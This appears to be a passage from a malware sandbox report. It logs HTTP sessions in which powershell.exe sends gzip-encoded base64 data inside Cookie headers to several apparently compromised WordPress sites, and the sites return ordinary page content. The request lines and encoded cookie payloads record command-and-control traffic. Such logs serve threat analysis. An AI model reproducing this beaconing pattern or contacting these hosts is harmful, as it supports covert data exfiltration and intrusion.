                                                    Host: thezoneheights.co.za
                                                    Connection: Close
                                                    2024-12-18 10:23:09 UTC485INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:23:05 GMT
                                                    Server: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fips
                                                    X-Powered-By: PHP/7.4.8
                                                    Link: <https://thezoneheights.co.za/wp-json/>; rel="https://api.w.org/", <https://thezoneheights.co.za/wp-json/wp/v2/pages/113>; rel="alternate"; title="JSON"; type="application/json", <https://thezoneheights.co.za/>; rel=shortlink
                                                    Vary: Accept-Encoding,User-Agent
                                                    Connection: close
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    2024-12-18 10:23:09 UTC4286INData Raw: 31 30 62 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 54 68 65 20 5a 6f 6e 65 20 48 65 69 67 68 74 73 20 26 23 38 32 31 31 3b 20 54 68 65 20 7a 7a 6f 6e 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61
                                                    Data Ascii: 10b6<!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>The Zone Heights &#8211; The zzone</title><meta na
                                                    2024-12-18 10:23:09 UTC8192INData Raw: 31 66 34 30 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 68 65 7a 6f 6e 65 68 65 69 67 68 74 73 2e 63 6f 2e 7a 61 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 64 69 73 74 2f 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 37 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 63 6c 61 73 73 69 63 2d 74 68 65 6d 65 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2e 77 70 2d 62 6c 6f 63 6b 2d
                                                    Data Ascii: 1f40<link rel='stylesheet' id='wp-block-library-css' href='https://thezoneheights.co.za/wp-includes/css/dist/block-library/style.min.css?ver=6.7.1' media='all' /><style id='classic-theme-styles-inline-css'>/*! This file is auto-generated */.wp-block-
                                                    2024-12-18 10:23:09 UTC1524INData Raw: 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 6f 6f 6c 2d 74 6f 2d 77 61 72 6d 2d 73 70 65 63 74 72 75 6d 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 63 6f 6f 6c 2d 74 6f 2d 77 61 72 6d 2d 73 70 65 63 74 72 75 6d 29 20 21 69 6d 70 6f 72 74
                                                    Data Ascii: ght-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !import
                                                    2024-12-18 10:23:09 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:23:09 UTC4309INData Raw: 31 30 63 64 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 68 65 7a 6f 6e 65 68 65 69 67 68 74 73 2e 63 6f 2e 7a 61 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 73 74 79 6c 65 73 2e 63 73 73 3f 76 65 72 3d 35 2e 37 2e 35 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 68 65 6c 6c 6f 2d 65 6c 65 6d 65 6e 74 6f 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 68 65 7a 6f 6e 65 68 65 69 67 68 74 73 2e 63 6f 2e 7a
                                                    Data Ascii: 10cd<link rel='stylesheet' id='contact-form-7-css' href='https://thezoneheights.co.za/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.5.1' media='all' /><link rel='stylesheet' id='hello-elementor-css' href='https://thezoneheights.co.z
                                                    2024-12-18 10:23:09 UTC8192INData Raw: 31 66 34 30 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 46 46 46 46 46 46 22 3e 0a 09 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 7a 6f 6e 65 68 65 69 67 68 74 73 2e 63 6f 2e 7a 61 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 33 2f 63 72 6f 70 70 65 64 2d 6c 6f 67 6f 74 7a 68 2d 33 32 78 33 32 2e 6a 70 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 7a 6f 6e 65 68 65 69 67 68 74 73 2e 63 6f 2e 7a 61 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f
                                                    Data Ascii: 1f40<meta name="theme-color" content="#FFFFFF"><link rel="icon" href="https://thezoneheights.co.za/wp-content/uploads/2023/03/cropped-logotzh-32x32.jpg" sizes="32x32" /><link rel="icon" href="https://thezoneheights.co.za/wp-content/uploads/2023/
                                                    2024-12-18 10:23:10 UTC7817INData Raw: 2d 69 63 6f 6e 2d 6c 69 73 74 2d 74 65 78 74 22 3e 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 69 74 65 6d 20 65 6c 65 6d 65 6e 74 6f 72 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 69 63 6f 6e 22 3e 0a 09 09 09 09 09 09 09 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 65 2d 66 6f 6e 74 2d 69 63 6f 6e 2d 73 76 67 20 65 2d 66 61 62 2d 6c 69 6e 6b 65 64 69 6e 2d 69 6e 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 34 38 20 35 31 32 22 20 78
                                                    Data Ascii: -icon-list-text"></span></li><li class="elementor-icon-list-item elementor-inline-item"><span class="elementor-icon-list-icon"><svg aria-hidden="true" class="e-font-icon-svg e-fab-linkedin-in" viewBox="0 0 448 512" x
                                                    2024-12-18 10:23:10 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:23:10 UTC8192INData Raw: 31 66 34 30 0d 0a 09 09 3c 64 69 76 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 74 79 70 65 3d 22 77 70 2d 70 61 67 65 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 69 64 3d 22 31 31 33 22 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 20 65 6c 65 6d 65 6e 74 6f 72 2d 31 31 33 22 3e 0a 09 09 09 09 09 09 09 09 09 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 20 65 6c 65 6d 65 6e 74 6f 72 2d 74 6f 70 2d 73 65 63 74 69 6f 6e 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 35 36 61 32 31 62 64 39 20 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 2d 68 65 69 67 68 74 2d 6d 69 6e 2d 68 65 69 67 68 74 20 65 6c 65 6d 65 6e 74 6f 72
                                                    Data Ascii: 1f40<div data-elementor-type="wp-page" data-elementor-id="113" class="elementor elementor-113"><section class="elementor-section elementor-top-section elementor-element elementor-element-56a21bd9 elementor-section-height-min-height elementor
                                                    2024-12-18 10:23:10 UTC7822INData Raw: 6e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 64 69 76 69 64 65 72 2d 73 65 70 61 72 61 74 6f 72 3a 62 65 66 6f 72 65 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 64 69 76 69 64 65 72 2d 2d 76 69 65 77 2d 6c 69 6e 65 5f 74 65 78 74 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 64 69 76 69 64 65 72 2d 73 65 70 61 72 61 74 6f 72 3a 61 66 74 65 72 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 64 69 76 69 64 65 72 2d 2d 76 69 65 77 2d 6c 69 6e 65 5f 74 65 78 74 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 64 69 76 69 64 65 72 2d 73 65 70 61 72 61 74 6f 72 3a 62 65 66 6f 72 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 62 6f 72 64 65 72 2d 74 6f
                                                    Data Ascii: n .elementor-divider-separator:before,.elementor-widget-divider--view-line_text .elementor-divider-separator:after,.elementor-widget-divider--view-line_text .elementor-divider-separator:before{display:block;content:"";border-bottom:0;flex-grow:1;border-to


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    31192.168.11.2049746129.232.136.1704431972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:23:11 UTC2269OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVQy07DMBD8FfIDPSHuxQSaQ9WobqnUCwrOJlnil3adNJXy8Ti4lAPywbO7M571fFaqb8kNtj5U3G8chzlTznYJMDHHKzTG2TmrtU79+mLmDCavHQHNWeNsqGlMs6LWMGfYNpM4FhJoRHWr822c2gBa+M2LKOWo/mpQ+FN/dfjBvyLN1WK/BePo+iCc8QTMuKyya5pIERpVf3D7YelYWHu/Kt6EWJ3Q3p29uwB [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: wickandjuice.co.za
                                                    Connection: Close
                                                    2024-12-18 10:23:13 UTC422INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:23:12 GMT
                                                    Server: Apache
                                                    Link: <https://wickandjuice.co.za/wp-json/>; rel="https://api.w.org/", <https://wickandjuice.co.za/wp-json/wp/v2/pages/2139>; rel="alternate"; type="application/json", <https://wickandjuice.co.za/>; rel=shortlink
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, close
                                                    Vary: Accept-Encoding
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    2024-12-18 10:23:13 UTC7770INData Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 5a 41 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74
                                                    Data Ascii: 2000<!DOCTYPE html><html lang="en-ZA" prefix="og: https://ogp.me/ns#"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="pingback" href="htt
                                                    2024-12-18 10:23:13 UTC428INData Raw: 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 65 29 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74
                                                    Data Ascii: :"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everyt
                                                    2024-12-18 10:23:13 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:23:14 UTC8192INData Raw: 32 30 30 30 0d 0a 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28 65 3d 6e 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26
                                                    Data Ascii: 2000orts.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&
                                                    2024-12-18 10:23:14 UTC6INData Raw: 78 20 72 67 62 61
                                                    Data Ascii: x rgba
                                                    2024-12-18 10:23:14 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:23:14 UTC8192INData Raw: 32 30 30 30 0d 0a 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32
                                                    Data Ascii: 2000(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-flow > .alignright{float: right;margin-inline-start: 2
                                                    2024-12-18 10:23:14 UTC6INData Raw: 3d 27 65 6c 65 63
                                                    Data Ascii: ='elec
                                                    2024-12-18 10:23:14 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:23:14 UTC8192INData Raw: 32 30 30 30 0d 0a 74 72 6f 2d 73 74 79 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 69 63 6b 61 6e 64 6a 75 69 63 65 2e 63 6f 2e 7a 61 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 65 6c 65 63 74 72 6f 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 33 2e 30 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 79 69 74 68 5f 79 77 72 61 71 5f 66 72 6f 6e 74 65 6e 64 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 69 63 6b 61 6e 64 6a 75 69 63 65 2e 63 6f 2e 7a 61 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 79 69 74 68 2d 77 6f 6f 63 6f 6d 6d 65 72 63
                                                    Data Ascii: 2000tro-style-css' href='https://wickandjuice.co.za/wp-content/themes/electro/style.min.css?ver=3.0.3' type='text/css' media='all' /><link rel='stylesheet' id='yith_ywraq_frontend-css' href='https://wickandjuice.co.za/wp-content/plugins/yith-woocommerc


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    32192.168.11.204974788.218.116.1374438988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:23:32 UTC2262OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVQy07DMBD8FfIDPSHuxQSaQ9WobqnUCwrOJlnil3adNJXy8Ti4lAPywbO7M571fFaqb8kNtj5U3G8chzlTznYJMDHHKzTG2TmrtU79+mLmDCavHQHNWeNsqGlMs6LWMGfYNpM4FhJoRHWr822c2gBa+M2LKOWo/mpQ+FN/dfjBvyLN1WK/BePo+iCc8QTMuKyya5pIERpVf3D7YelYWHu/Kt6EWJ3Q3p29uwB [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: pensuni.com
                                                    Connection: Close
                                                    2024-12-18 10:23:33 UTC326INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Wed, 18 Dec 2024 10:23:33 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Vary: Accept-Encoding
                                                    X-Cached-With: ezCache
                                                    Vary: Accept-Encoding, Cookie
                                                    Last-Modified: Wed, 18 Dec 2024 08:31:46 GMT
                                                    X-Proxy-Cache: MISS
                                                    2024-12-18 10:23:33 UTC16058INData Raw: 37 65 65 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 20 3c 68 74 6d 6c 20 64 69 72 3d 22 72 74 6c 22 20 6c 61 6e 67 3d 22 68 65 2d 49 4c 22 20 64 61 74 61 2d 73 6b 69 6e 3d 22 6c 69 67 68 74 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 20 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 2f 3e 20 3c 73 74 79 6c 65 20 69 64 3d 22 6a 65 74 70 61 63 6b 2d 62 6f 6f 73 74 2d 63 72 69 74 69 63 61 6c 2d 63 73 73 22 3e 40 6d 65 64 69 61 20 61 6c 6c 7b 62 6f 64 79 20 2e 61 63 63 65 73 73 61 62 69 6c 69 74 79 5f 63 6f 6e 74 61
                                                    Data Ascii: 7ee6<!DOCTYPE html> <html dir="rtl" lang="he-IL" data-skin="light" prefix="og: https://ogp.me/ns#"> <head> <meta charset="UTF-8"/> <link rel="profile" href="//gmpg.org/xfn/11"/> <style id="jetpack-boost-critical-css">@media all{body .accessability_conta
                                                    2024-12-18 10:23:33 UTC16384INData Raw: 66 31 31 65 31 65 7d 2e 74 69 65 2d 73 6c 69 64 65 72 2d 6e 61 76 7b 77 69 64 74 68 3a 31 30 30 25 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 31 3b 74 6f 70 3a 35 30 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 33 70 78 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 39 39 32 70 78 29 7b 2e 74 69 65 2d 73 6c 69 64 65 72 2d 6e 61 76 7b 6f 70 61 63 69 74 79 3a 30 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 36 37 70 78 29 7b 2e 67 72 69 64 2d 73 6c 69 64 65 72 2d 77 72 61 70 70 65 72 20 2e 74 69 65 2d 73 6c 69 64 65 72 2d 6e 61 76 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 7d 2e 73 6c 69 64 65 72 2d 61 72 72 6f 77 2d 6e 61 76 7b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 6c 65 66
